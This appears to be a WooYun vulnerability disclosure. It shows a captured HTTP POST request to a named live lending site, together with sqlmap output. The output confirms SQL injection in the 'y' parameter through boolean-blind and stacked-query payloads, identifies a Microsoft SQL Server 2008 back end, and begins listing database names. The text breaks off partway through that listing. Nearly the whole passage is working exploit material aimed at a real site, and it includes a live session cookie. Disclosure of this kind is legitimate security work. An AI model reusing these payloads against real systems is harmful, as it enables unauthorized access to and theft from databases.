WooYun.org

POST /ytbinvestor.html?type=ytbAjax HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.etiandai.com:80/
Cookie: __cfduid=d5e5741a0f5123c9e356e9485f12b0c7e1447089740; ASP.NET_SessionId=s00nk3a4j3uyql55jfyv0mv1
Host: www.etiandai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
index=1&y=611

[01:48:01] [INFO] checking if the injection point on POST parameter 'y' is a false positive
POST parameter 'y' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 280 HTTP(s) requests:
---
Parameter: y (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: index=1&y=611 AND 4232=4232
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: index=1&y=611;WAITFOR DELAY '0:0:5'--
---
[01:48:15] [INFO] testing Microsoft SQL Server
[01:48:15] [INFO] confirming Microsoft SQL Server
[01:48:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[01:48:17] [INFO] fetching database names
[01:48:17] [INFO] fetching number of databases
[01:48:17] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[01:48:17] [INFO] retrieved: 8
[01:48:18] [INFO] retrieved: etdlogger
[01:48:32] [INFO] retrieved: e